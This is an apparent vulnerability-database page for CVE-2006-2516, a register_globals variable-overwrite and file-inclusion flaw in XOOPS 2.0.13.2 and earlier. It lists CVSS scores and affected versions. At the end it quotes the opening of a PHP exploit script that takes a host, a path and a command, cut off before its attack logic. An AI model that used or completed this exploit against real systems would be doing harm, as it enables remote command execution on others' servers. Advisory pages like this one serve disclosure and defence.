5.1
CVSSv2

CVE-2006-2516

Published: 22/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

mainfile.php in XOOPS 2.0.13.2 and previous versions, when register_globals is enabled, allows remote malicious users to overwrite variables such as $xoopsOption['nocommon'] and conduct directory traversal attacks or include PHP files via (1) xoopsConfig[language] to misc.php or (2) xoopsConfig[theme_set] to index.php, as demonstrated by injecting PHP sequences into a log file.

Vulnerable Product Search on Vulmon Subscribe to Product

xoops xoops 2.0

xoops xoops 2.0.4

xoops xoops 2.0.5

xoops xoops 2.0.9.3

xoops xoops

xoops xoops 2.0.11

xoops xoops 2.0.12_jp

xoops xoops 2.0.6

xoops xoops 2.0.7

xoops xoops 2.0.13.1

xoops xoops 2.0.2

xoops xoops 2.0.3

xoops xoops 2.0.9

xoops xoops 2.0.9.2

xoops xoops 2.0.1

xoops xoops 2.0.10

xoops xoops 2.0.5.1

xoops xoops 2.0.5.2

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "XOOPS <= 20132 'xoopsOption[nocommon]' exploit\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; /* works with: magic_quotes_gpc = Off register_globals = On */ if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; ec ...